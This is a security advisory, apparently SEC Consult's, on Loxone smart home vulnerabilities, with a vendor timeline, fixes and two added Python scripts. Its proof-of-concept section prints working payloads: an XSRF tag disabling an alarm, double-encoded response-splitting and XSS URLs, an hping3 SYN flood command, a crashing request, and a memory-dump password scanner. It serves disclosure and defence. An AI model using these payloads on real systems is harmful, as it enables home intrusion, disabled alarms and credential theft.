### Vendor & product description:

"Loxone Electronics was founded in 2009. Our focus is the development and
production of control solutions for all homes. Our aim is to make home
automation interesting, affordable and accessible for everyone."

URL: http://www.loxone.com/enus/company/about-us.html

### Business recommendation:

Most of the issues previously identified (see SEC Consult security advisory
SA-20150227-0) do not seem to have been fixed properly and are still
exploitable, either directly or by easily bypassing the implemented measures.
A very short crash test of only a few hours even resulted in new
vulnerabilities.

The Loxone smart home has multiple design and implementation flaws which,
combined, could be used by an attacker to:

1) remotely cause a denial of service condition that renders the smart home
   unusable and thereby effectively disables any Loxone-controlled alarm
   system,
2) steal the user's credentials for the management interface and fully
   control the smart home,
3) execute JavaScript code in the user's browser for further attacks,
4) control arbitrary devices connected to the system, e.g. switch lights
   on/off, remotely open doors or garages, disable the alarm system, etc.,
5) gain access to admin passwords of Loxone partners (e.g. electricians who
   implement the smart home solution at customers' premises) and completely
   take over other smart homes of the same Loxone partner!

SEC Consult recommends not to use this smart home system until a thorough
security analysis (white box) of all components has been performed by
security professionals, as a very short crash test (black box) already
resulted in critical vulnerabilities.

### Vulnerability overview/description:

#### 1) Cross-site request forgery (XSRF)

The system is vulnerable to XSRF attacks.
If an attacker is able to lure a user into clicking a crafted link, or embeds
such a link within web pages (e.g. discussion forums), he could control
arbitrary functions within the smart home system.

All functions can be controlled via web-based commands, e.g. in order to
switch on lights, remotely open doors or garages, disable the alarm system,
etc.

This can still be exploited in the current Loxone version and it does not seem
to have been fixed properly.

#### 2) HTTP Response Splitting / Header injection

The web server of the Loxone smart home system is vulnerable to HTTP response
splitting attacks. If an attacker is able to lure a user into clicking a
crafted link (e.g. just by clicking a URL in a discussion forum or phishing
email), he could arbitrarily manipulate the server's response (e.g. inject
JavaScript code).

This can still be exploited in the current Loxone version and it does not seem
to have been fixed properly. The implemented measures/filters can easily be
bypassed using double-encoded payloads.

This attack is not limited to the admin interface; it can be exploited on any
path of the web server.

SEC Consult has verified this attack in the most current versions of the
Mozilla Firefox and Google Chrome web browsers.

#### 3) Reflected cross-site scripting (XSS) vulnerability

The web interface of the Loxone smart home is vulnerable to reflected
cross-site scripting attacks. If an attacker is able to lure a user into
clicking a crafted link (e.g. just by clicking a URL in a discussion forum or
phishing email), he could execute arbitrary JavaScript code in the user's
browser. Thereby he could steal the user's credentials or control arbitrary
devices within the smart home system. To exploit this vulnerability it is not
mandatory for the user to be authenticated.
Both unauthenticated XSS vulnerabilities (by exploiting the HTTP response
splitting vulnerability described in 2) and authenticated ones exist.

SEC Consult has verified this attack in the most current versions of the
Mozilla Firefox and Google Chrome web browsers.

#### 4) Denial of service

An attacker could perform a denial of service attack with simple measures,
such as SYN flood attacks. During such an attack the system is not accessible
via the network and can no longer be controlled, which also means that alarm
systems won't work!

This can still be exploited in the current Loxone version and it does not seem
to have been fixed properly. The miniserver was not reachable during the
attack and rebooted after a short while (a few seconds) of running the attack
(depending on the bandwidth).

Furthermore, other new DoS attack vectors have been identified which crash the
web interface and are not related to bandwidth-based network attacks.

#### 5) Decrypted Loxone Config passwords in memory

The "Loxone Config" programming software for the Loxone smart home allows
saving the whole configuration into an XML file for backup or for user support
(e.g. via a ticketing system or discussion forum). This XML config file
contains the usernames and passwords of all configured users (admin or
non-admin, with different access levels).

Loxone partners (e.g. electricians who implement the smart home at customers'
premises) may also send such config files to their customers or provide end
users with admin-level access via separate admin user accounts. The password of
the Loxone partner's own admin account is usually not shared and should be
kept secret.

The passwords are stored encrypted (not hashed!) within the config file and
are immediately decrypted in memory as soon as such a config file is opened
with the Loxone Config software. Access to the Loxone miniserver is not
needed!

An attacker exploiting this issue is able to gain access to the admin password
of the Loxone partner!
This is especially critical if the same password is used in different
customer installations. Attackers (e.g. one customer of the Loxone partner)
can then directly manipulate or control other Loxone smart homes of the same
Loxone partner!

### Proof of concept:

#### 1) Cross-site request forgery (XSRF)

This can still be exploited in the current Loxone version and it does not seem
to have been fixed entirely. As an example, the alarm system of the Loxone
"demo case" can be disabled via the following XSRF payload, provided the admin
has previously authenticated to the web services (HTTP Basic authentication,
see 2) below) and is browsing with the same web browser, so that the browser
attaches the cached credentials to the image request:

```
<html>
<img src=http://$ip/dev/sps/io/Alarmanlage/off></img>
</html>
```

#### 2) HTTP Response Splitting / Header injection

The following payload only works when the web interface is accessed by a user
who is _not_ authenticated, which will be the case most of the time in regular
use. This makes successful exploitation easier.

The WWW-Authenticate header is not properly sanitized and uses the request URI
as the "Basic realm" value. Any payload within the URL will be added to the
realm. It is possible to inject new headers or manipulate the response body in
order to inject arbitrary HTML/JavaScript code (response splitting / header
injection).

The following URL demonstrates this issue and injects some HTML/JavaScript
code (combined XSS attack) that generates a popup as an example:

```
http://$ip/%2522%250aContent-Type:%20text%252fhtml%250a%250a%253chtml%253e%253cscript%253ealert%28123%29%253c%252fscript%253e%253c%252fhtml%253e
```

An attacker who is able to trick a user into clicking this link (e.g.
phishing email or discussion forum) will, for example, be able to re-create
the login page of the Loxone miniserver device and trick the user into sending
username/password to an attacker-controlled server.

#### 3) Reflected cross-site scripting (XSS) vulnerability

To reproduce this behavior it is sufficient to open the following URL as an
authenticated user (or to social-engineer the victim into entering the
credentials when prompted), which will show a popup message and turn on the
LED light of the Loxone demo case. The payload uses double-encoded values in
order to bypass the previously, incorrectly implemented filters:

```
http://$ip/dev/sps/io/%2522%253E%253Cscript%2520xmlns=%2527http:%2526%2523x2f%253B%2526%2523x2f%253Bwww.w3.org/1999/xhtml%2527%253Ealert%2528%2527you%2520got%2520p0wned%2520again%2527%2529%253b%2520r=new%2520XMLHttpRequest%2528%2529;%2520r.open%2528%2527GET%2527,%2527/dev/sps/io/MK_T5/on%2527,true%2529;%2520r.send%2528%2529;%253C/script%253E
```

#### 4) Denial of service

Running the following command will keep the miniserver in a non-responsive
state after a few seconds (depending on the bandwidth) and it will not recover
until the attack is stopped (it will reboot afterwards). During this attack
nothing can be controlled anymore (no switch of the demo case worked):

```
hping3 -S --flood -p 80 $ip
```

Furthermore, the following HTTP request (sometimes it is necessary to send it
a few times) renders the web interface itself unusable. It is no longer
possible to control the smart home, as the web interface does not work
properly anymore (e.g.
afterwards connection reset/unreachable errors or login errors occur although
the password has been correctly entered in the web interface, etc.):

```
GET /index.html HTTP/1.1
Host: foo
Sec-WebSocket-Key1: foo

```

A reboot is necessary in order to make the web interface work again.

#### 5) Decrypted Loxone Config passwords in memory

This vulnerability can easily be verified by dumping the memory of the
attacker's own system, which every local attacker has access to if he wants
to obtain the passwords of his Loxone partner or those contained in
configuration files published by other users on the Internet!

It has been verified by installing Loxone Config in a virtual environment
(VirtualBox) and using the following command to gain access to the memory:

```
VBoxManage debugvm $vmname dumpguestcore --filename dump
```

Upon opening the config file (e.g. of any Loxone partner or other end user
who has published his configuration in the discussion forum), the Loxone
Config software will immediately decrypt the passwords and keep them
unencrypted in memory. The encryption key is suspected to be the same for all
Loxone Config installations, but this has not been verified (no reverse
engineering of Loxone Config has been performed).
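The search of the dump described in this section can be scripted. The Python
scanner below is an added example written for this page, not code from SEC
Consult or from Loxone: it looks for a known username in a memory dump, as
plain 8-bit text and as UTF-16LE (the form Windows programs commonly keep
strings in), and lists the printable strings found next to each hit. The dump
it runs on by default is constructed inline; the user record, the credential
`K0Xk9vQ2f1m` and the record layout in it are invented, since a real dump
simply holds whatever the program left in memory.

```python
"""Added example for item 5) (not code from SEC Consult or Loxone): a scanner
that finds a known username in a memory dump and lists the printable strings
next to each hit, as ASCII and as UTF-16LE (Windows programs commonly keep
strings as UTF-16LE). The dump built below is a constructed stand-in; the
credential and record layout in it are invented, since a real dump simply
holds whatever the program left in memory."""
from __future__ import annotations

import re
from pathlib import Path

ASCII_RUN = re.compile(rb"[\x20-\x7e]{4,}")
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")


def strings_near(dump: bytes, needle: str, window: int = 64) -> list[str]:
    """Printable runs within `window` bytes of every occurrence of `needle`,
    which is searched for in both encodings. Order of discovery, no duplicates."""
    hits = {}  # dict used as an insertion-ordered set
    for enc in ("ascii", "utf-16-le"):
        pat = needle.encode(enc)
        pos = dump.find(pat)
        while pos != -1:
            chunk = dump[max(0, pos - window): pos + len(pat) + window]
            for m in ASCII_RUN.finditer(chunk):
                hits[m.group().decode("ascii")] = None
            for m in UTF16_RUN.finditer(chunk):
                hits[m.group().decode("utf-16-le")] = None
            pos = dump.find(pat, pos + 1)
    return list(hits)


def candidate_secrets(dump: bytes, username: str) -> list[str]:
    """Everything found near the username except the username itself; with a
    real dump this is the short list a human then inspects."""
    return [s for s in strings_near(dump, username) if s != username]


def scan_file(path: str, username: str) -> list[str]:
    """Run the search over a dump on disk, e.g. the file written by
    `VBoxManage debugvm ... dumpguestcore --filename dump`. The file is read
    as a flat byte stream, so its container format does not matter."""
    return candidate_secrets(Path(path).read_bytes(), username)


def make_sample_dump() -> bytes:
    """Constructed stand-in for a real dump: non-printable filler around two
    hypothetical copies of a decrypted user record, one 8-bit, one UTF-16LE."""
    filler = bytes([0x00, 0x01, 0xFF, 0x10]) * 200
    record_8bit = b'<User name="installer" pwd="K0Xk9vQ2f1m"/>'
    record_utf16 = ("installer".encode("utf-16-le") + b"\x00\x00"
                    + "K0Xk9vQ2f1m".encode("utf-16-le") + b"\x00\x00")
    return filler + record_8bit + filler + record_utf16 + filler


if __name__ == "__main__":
    for s in candidate_secrets(make_sample_dump(), "installer"):
        print(repr(s))
```

Against a real VirtualBox core, `scan_file("dump", "<partner username>")`
does the same; expect noise, since any string that happens to sit near the
username is listed, and widen `window` if the password is stored further away
from the name than in the constructed sample.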
Access to the miniserver is not needed; it is simply enough to open the
configuration file.

The decrypted passwords of all users can easily be found in the dumped memory
by searching for the username.

### Vulnerable / tested versions:

The vulnerabilities have been verified to exist in firmware version 6.3.3.11
of the Loxone smart home, which was the most recent version at the time of
discovery. It is assumed that all previous firmware versions are affected as
well.

### Vendor contact timeline:

* 2015-03-13: Contacting vendor through email, sending responsible disclosure
  policy, defining release deadline (4th May), asking for encryption keys
* 2015-03-13: Vendor: no encryption available; sending advisory unencrypted
* 2015-03-19: Answering question of Loxone regarding CSRF attacks
* 2015-04-16: Asking for status update: vendor asks to delay disclosure until
  14th May
* 2015-05-13: Updated firmware v6.4.5.12 available
* 2015-05-14: SEC Consult releases security advisory

### Solution:

According to the vendor, firmware version v6.4.5.12 fixes the identified
security issues.

It can be downloaded at the following URL and should be installed immediately
in order to increase the level of security:

http://www.loxone.com/tl_files/loxone/downloads/config/Loxone-Config-6.4.5.12.zip

### Workaround:

Only connect to your miniserver via a secure VPN and disable any port
forwardings.

Use an isolated PC (browser) to control the smart home and do not surf the
web while being logged in to the miniserver web interface.

Use different passwords for all installations and don't reuse them.
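The proof-of-concept URLs for items 2) and 3) above both rely on double
percent-encoding. The Python script below is an added example written for
this page, not code from SEC Consult or from Loxone's firmware. It models the
behaviour the advisory describes: a filter that decodes the request path once
and then blacklists, while the value that reaches the response is decoded
again; it then rebuilds the 401 challenge with the decoded URI in the realm,
parses it the way a browser that tolerates a bare LF would, and shows a
hardened variant. Every server-side detail (the filter, the single versus
double decoding, the constant realm name "Loxone Miniserver") is an
assumption, not Loxone's implementation.

```python
"""Added example for items 2) and 3) of the proof of concept (not code from
SEC Consult or Loxone): models a filter that percent-decodes once while the
value reaching the response is decoded again, reconstructs the split 401
response a browser sees, and shows a hardened variant. All server-side
behaviour here is an assumption based on the advisory's description."""
from __future__ import annotations

import re
from urllib.parse import unquote

# Path components of the two proof-of-concept URLs quoted in the advisory.
SPLIT_PATH = ("/%2522%250aContent-Type:%20text%252fhtml%250a%250a%253chtml%253e"
              "%253cscript%253ealert%28123%29%253c%252fscript%253e%253c%252fhtml%253e")
XSS_PATH = ("/dev/sps/io/%2522%253E%253Cscript%2520xmlns=%2527http:%2526%2523x2f%253B"
            "%2526%2523x2f%253Bwww.w3.org/1999/xhtml%2527%253Ealert%2528%2527you"
            "%2520got%2520p0wned%2520again%2527%2529%253b%2520r=new%2520XMLHttpRequest"
            "%2528%2529;%2520r.open%2528%2527GET%2527,%2527/dev/sps/io/MK_T5/on%2527,"
            "true%2529;%2520r.send%2528%2529;%253C/script%253E")

DANGEROUS = ("<script", "\r", "\n")


def fully_decode(path: str) -> str:
    """Percent-decode until nothing changes: the text an output stage that
    decodes a second time ends up emitting, and what the browser executes."""
    prev, cur = None, path
    while cur != prev:
        prev, cur = cur, unquote(cur)
    return cur


def naive_filter(path: str) -> bool:
    """Assumed broken filter: decode once, then blacklist. True = let through."""
    once = unquote(path).lower()
    return not any(token in once for token in DANGEROUS)


def strict_filter(path: str) -> bool:
    """Same blacklist applied after full normalisation; closes the
    double-encoding bypass (output encoding is still the real fix)."""
    full = fully_decode(path).lower()
    return not any(token in full for token in DANGEROUS)


def safe_header_value(value: str) -> bool:
    """A header value may never contain CR, LF or other control characters."""
    return re.search(r"[\x00-\x1f\x7f]", value) is None


def build_401_vulnerable(path: str) -> bytes:
    """Assumed flaw from item 2): the decoded request URI is copied into the
    realm of the challenge without any check or escaping."""
    realm = fully_decode(path)
    return (f'HTTP/1.1 401 Unauthorized\r\n'
            f'WWW-Authenticate: Basic realm="{realm}"\r\n'
            f'Content-Length: 0\r\n\r\n').encode("latin-1")


def build_401_hardened(path: str) -> bytes:
    """Fixed variant: the request path is deliberately ignored and a constant
    realm (name assumed) is used, so the URI never reaches a header; the guard
    shows where a dynamic value would have to be checked."""
    realm = "Loxone Miniserver"
    if not safe_header_value(realm):
        raise ValueError("control character in header value")
    return (f'HTTP/1.1 401 Unauthorized\r\n'
            f'WWW-Authenticate: Basic realm="{realm}"\r\n'
            f'Content-Length: 0\r\n\r\n').encode("latin-1")


def parse_like_a_browser(raw: bytes) -> tuple[str, dict[str, str], str]:
    """Lenient parse that, like the browsers named in the advisory, accepts a
    bare LF as a line terminator. Returns (status line, headers, body)."""
    text = raw.decode("latin-1")
    m = re.search(r"\r?\n\r?\n", text)
    head, body = (text[:m.start()], text[m.end():]) if m else (text, "")
    lines = re.split(r"\r?\n", head)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


if __name__ == "__main__":
    for label, path in (("2) response splitting", SPLIT_PATH), ("3) XSS", XSS_PATH)):
        print(f"{label}: naive filter lets it through: {naive_filter(path)}, "
              f"strict filter: {strict_filter(path)}")
        print("   browser sees:", fully_decode(path)[:72])
    status, headers, body = parse_like_a_browser(build_401_vulnerable(SPLIT_PATH))
    print("injected Content-Type:", headers.get("content-type"), "| body:", body[:40])
```

Run stand-alone, the script shows both payloads passing the once-decoding
filter and being blocked by the normalising one, and the realm injection
producing a `Content-Type: text/html` header followed by the attacker's HTML
as the response body. The take-away for a fix is the order of operations:
normalise completely before any check, and never let request data into a
header at all where a constant will do.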